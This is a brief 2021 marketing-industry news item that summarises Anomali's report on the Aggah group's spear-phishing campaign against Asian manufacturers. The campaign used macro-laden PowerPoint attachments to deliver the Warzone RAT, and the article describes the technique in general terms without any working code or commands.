• by Ray Schultz , August 13, 2021

Marketers should be on the lookout for a new attempt by spear phishing artists to hijack their sites. 

The Pakistan-based threat actor Aggah is allegedly using sites to deliver Warzone Rat, a very dangerous form of malware, to manufacturing sites in Taiwan and South Korea, cyber security firm Anomali reports. 

This summer’s campaign started with a custom email pretending to be from “foodHub.co.uk,” an online delivery service. 

“The email body includes order and shipping information as well as an attached PowerPoint file named “Purchase order 4500061977,pdf.ppam” that contains obfuscated macros that use mshta.exe to execute JavaScript from a known compromised website, mail.hoteloscar.in/images/5[.]html, researchers explained, according to threatpost.

It's not clear how a hijacked foodHub.co.uk url would have bamboozled manufacturing employees in Asia. 

Hoteloscar.in, a website for a hotel in India, has also been compromised, leading them to believe that the threat actors may have exploited a WordPress vulnerability.” 

Anomali writes that it “discovered a spearphishing campaign that appears to have begun in early July 2021, targeting the manufacturing industry throughout Asia. The tactics, techniques, and procedures (TTPs) identified in this campaign align with the Aggah threat group.”

It continues, “Our analysis found multiple PowerPoint files that contained malicious macros that used MSHTA to execute a script utilizing PowerShell to load hex-encoded payloads. Based on the TTPs of this campaign, we assess with moderate confidence this is Aggah.”